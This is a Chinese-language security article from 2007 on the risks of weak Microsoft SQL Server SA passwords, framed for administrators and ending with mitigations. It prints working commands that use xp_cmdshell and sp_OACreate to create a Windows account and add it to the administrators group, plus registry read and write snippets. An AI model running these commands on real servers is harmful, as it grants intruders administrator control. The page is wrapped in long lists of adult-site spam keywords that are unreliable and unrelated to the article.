国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

系統(tǒng)安全之SA弱口令帶來的安全隱患
2007-01-18   

存在Microsoft SQL Server SA弱口令漏洞的計算機一直是網(wǎng)絡攻擊者青睞的對象之一,通過這個漏洞,可以輕易的得到服務器的管理權(quán)限,從而威脅網(wǎng)絡及數(shù)據(jù)的安全。作為網(wǎng)絡管理員,我們可不能不聞不問,一定要弄清楚這其中的起因、經(jīng)過和結(jié)果,才能有的放矢,做到更為有效的防范,下面我就詳細的向大家介紹一下。

Microsoft SQLServer是一個C/S模式的強大的關系型數(shù)據(jù)庫管理系統(tǒng),應用領域十分廣泛,從網(wǎng)站后臺數(shù)據(jù)庫到一些MIS(管理信息系統(tǒng))到處都可以看到它的身影。網(wǎng)絡中利用Microsoft SQLServer SA弱口令入侵的核心內(nèi)容就是利用Microsoft SQLServer中的存儲過程獲得系統(tǒng)管理員權(quán)限,那到底什么是存儲過程?

存儲過程是存儲在SQLServer中的預先寫好的SQL語句集合,其中危險性最高的擴展存儲過程就是xp_cmdshell了,它可以執(zhí)行操作系統(tǒng)的任何指令,而SA是Microsoft SQLServer的管理員帳號,擁有最高權(quán)限,它可以執(zhí)行擴展存儲過程,并獲得返回值,比如執(zhí)行:

exec master..xp_cmdshell 'net user test 1234 /add'和exec master..xp_cmdshell 'net 
localgroup administrators test /add'


這樣對方的系統(tǒng)就被添加了一個用戶名為test,密碼為1234,有管理員權(quán)限的用戶,如圖一所示。

498)this.style.width=498;">

現(xiàn)在你應該明白為什么得到SA密碼,就可以得到系統(tǒng)的最高權(quán)限了吧。而往往不少網(wǎng)絡管理員不清楚這個情況,為自己的SA用戶起了一些諸如1234,4321等簡單的密碼,甚至根本就不設置密碼,這樣網(wǎng)絡入侵者就可以利用一些黑客工具很輕松的掃描到SA的密碼,進而控制計算機。

除了xp_cmdshell,還有一些存儲過程也有可能會被入侵者利用到:

1、xp_regread(這個擴展存儲過程可以讀取注冊表指定的鍵里指定的值),使用方法(得到機器名):

DECLARE @test varchar(50)
EXEC master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='system\controlset001\control\computername\computername',
@value_name='computername',
@value=@test OUTPUT
SELECT @test

2、xp_regwrite(這個擴展存儲過程可以寫入注冊表指定的鍵里指定的值),使用方法(在鍵HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue寫入bbb):

EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'


如果被入侵的計算機的administrator用戶可以瀏覽注冊表中的HKEY_LOCAL_MACHINE\SAM\SAM\信息,那使用xp_regread、xp_regwrite這兩個存儲過程可以實現(xiàn)克隆administrator用戶,得到管理員權(quán)限。xp_regdeletekey、xp_regdeletevalue也會對系統(tǒng)帶來安全隱患。

3、OLE相關的一系列存儲過程,這系列的存儲過程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,使用方法:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT 
EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user test 
1234 /add'--


這樣對方系統(tǒng)增加了一個用戶名為test,密碼為1234的用戶,再執(zhí)行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT 
EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup 
administrators test /add '--


用戶test,被加入管理員組。

解決辦法:給SA起個足夠復雜的密碼,使網(wǎng)絡攻擊者很難破解出來。為了保險,我們還要到在SQLServer的查詢分析器中使用存儲過程sp_dropextendedproc刪除xp_cmdshell等存儲過程,需要時再使用sp_addextendedproc恢復即可,具體操作可以在SQLServer中查詢sp_dropextendedproc和sp_addextendedproc的使用幫助,需要注意一點的是刪除OLE相關系列的存儲過程,可能會造成企業(yè)管理器中的某些功能無法使用,這里筆者不建議刪除。

既然我們知道了SP_OACREATE的使用方法,那我們就可以到\WINNT\system32下找到cmd.exe,net.exe和net1.exe這三個文件,在“屬性”—“安全”中把可以對他們訪問的用戶全部刪除掉,這樣就無法使用SP_OACREATE來增加系統(tǒng)用戶了,在我們需要訪問這些文件的時候再加上訪問用戶就可以了。

熱詞搜索:

上一篇:如何徹底刪除Windows 2000默認共享
下一篇:系統(tǒng)安全之單機雙操作系統(tǒng)殺毒的技巧

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲成人免费在线| 久久综合九色综合欧美就去吻| 91麻豆精品国产自产在线| 色婷婷综合久久| 国产亚洲欧美日韩俺去了| 国产一区二区三区综合| 日本一二三四高清不卡| 色噜噜狠狠一区二区三区果冻| 日韩片之四级片| 久久www免费人成看片高清| 2021国产精品久久精品| 99re视频精品| 精品伦理精品一区| 成人av手机在线观看| 亚洲午夜精品网| 精品久久久久99| 日本亚洲免费观看| 久久久美女毛片| 在线观看日韩毛片| 精品中文字幕一区二区| 亚洲欧美日韩在线| 日韩欧美高清dvd碟片| 成人av片在线观看| 久久99精品久久久久婷婷| 欧美日韩一区二区三区免费看| 国产精品国产三级国产普通话三级| 日本亚洲天堂网| 国产精品久久久久四虎| 欧美日韩一区视频| 成人午夜碰碰视频| 久久国内精品视频| 亚洲综合男人的天堂| 91蜜桃婷婷狠狠久久综合9色| 国产色91在线| 韩国精品主播一区二区在线观看| 制服丝袜亚洲网站| 成人午夜av电影| 青青草国产成人av片免费| 亚洲色图欧洲色图婷婷| 欧美精品一区在线观看| 国产在线视频不卡二| 亚洲黄色免费电影| 久久精品视频在线免费观看| 欧美二区乱c少妇| 色婷婷一区二区三区四区| 国产精品一二三区在线| 久久精品国产成人一区二区三区 | 日本91福利区| 亚洲天堂精品视频| 中文字幕一区二区不卡| 欧美影视一区在线| 亚洲大片免费看| 亚洲精品久久久蜜桃| 国产精品进线69影院| 久久久一区二区| 国产欧美视频在线观看| 久久综合五月天婷婷伊人| 欧美sm美女调教| 精品美女一区二区| 国产亚洲一二三区| 亚洲欧美综合色| 一区二区三区日韩| 亚洲3atv精品一区二区三区| www久久精品| 精品区一区二区| 国产欧美一区二区精品婷婷 | 99久久国产免费看| 成人福利电影精品一区二区在线观看 | 国产成+人+日韩+欧美+亚洲 | 日本一区二区在线不卡| 91激情在线视频| 95精品视频在线| 日韩av一区二| 日韩精品乱码免费| 激情六月婷婷久久| 亚洲高清免费观看高清完整版在线观看 | 国产伦理精品不卡| 国产成人亚洲精品青草天美| 亚洲一区二三区| 26uuu亚洲综合色欧美| 精品乱人伦小说| 国产精品理论片| 亚洲超碰精品一区二区| 日韩和欧美的一区| 国产福利一区在线| 免费国产亚洲视频| 国产一区二区精品在线观看| 亚洲国产视频在线| 免费人成在线不卡| 亚洲福利一二三区| 蜜臀av一级做a爰片久久| 国产 欧美在线| 精品视频全国免费看| 国产午夜精品一区二区三区视频| 日韩一区二区在线看| eeuss鲁片一区二区三区在线观看| 蜜臀久久久99精品久久久久久| 亚洲视频在线观看三级| 久久美女高清视频| 亚洲男人的天堂av| 国产一区二区美女| 欧美人成免费网站| 国产精品伦一区| 久久狠狠亚洲综合| 国产激情视频一区二区在线观看 | av不卡在线观看| 8x福利精品第一导航| 国产精品蜜臀在线观看| 麻豆国产精品官网| 精品一区二区综合| 在线亚洲免费视频| 欧美激情一区二区| 韩国视频一区二区| 国产精品自拍三区| 欧美精品久久久久久久久老牛影院| 欧美三级电影精品| 国产欧美日韩在线视频| 美女视频黄a大片欧美| 欧美午夜电影在线播放| 一区精品在线播放| 国产盗摄视频一区二区三区| 日韩一区二区三区观看| 精品成人a区在线观看| 一级日本不卡的影视| av中文字幕亚洲| 国产精品欧美一区喷水| 国产成人激情av| 久久亚洲综合av| 国内久久精品视频| 26uuu精品一区二区在线观看| 国产精品沙发午睡系列990531| 国产精品萝li| 成人av网站免费观看| 亚洲欧洲av一区二区三区久久| 午夜天堂影视香蕉久久| 麻豆成人av在线| 91精品婷婷国产综合久久竹菊| 欧美精品一区二区三区高清aⅴ| 久久久久久久久蜜桃| 激情小说亚洲一区| www久久久久| 成人免费视频一区| 日韩一区二区视频| 男男成人高潮片免费网站| 精品乱码亚洲一区二区不卡| 国产精品系列在线播放| 精品视频一区 二区 三区| 亚洲第一会所有码转帖| 91精品中文字幕一区二区三区| 中文字幕欧美一| 在线观看av一区二区| 亚洲aⅴ怡春院| 精品日韩99亚洲| 成人精品免费看| 欧美一区二区女人| 国产精品狼人久久影院观看方式| 无码av免费一区二区三区试看| 国产精品18久久久久久久久久久久| 91在线视频18| 亚洲成国产人片在线观看| 欧美成人国产一区二区| 91在线免费看| 久久se这里有精品| 亚洲色图在线视频| 日韩欧美自拍偷拍| 成人免费观看视频| 亚洲成av人影院| 国产精品素人视频| 91精品在线免费观看| av激情亚洲男人天堂| 日韩精品亚洲专区| 欧美高清www午色夜在线视频| 国产精品国产三级国产普通话三级| 蜜臀久久99精品久久久画质超高清| 一本久久综合亚洲鲁鲁五月天| 国产三级精品视频| 在线免费观看视频一区| 亚洲手机成人高清视频| 日韩欧美国产午夜精品| 在线精品视频小说1| 国产精品69久久久久水密桃| 香蕉加勒比综合久久| 欧美日韩国产经典色站一区二区三区| 中文字幕精品综合| 91精品久久久久久蜜臀| aaa亚洲精品| 亚洲精选视频在线| 国产欧美精品区一区二区三区 | 精品视频一区二区三区免费| 国产裸体歌舞团一区二区| 日韩一区二区高清| 色综合久久天天| 成人动漫精品一区二区| 国产一区二区三区| 毛片不卡一区二区| 国产午夜精品一区二区三区视频| 国产精品一区二区三区网站| 久久久亚洲精品一区二区三区| 自拍偷在线精品自拍偷无码专区 | 视频一区二区三区中文字幕|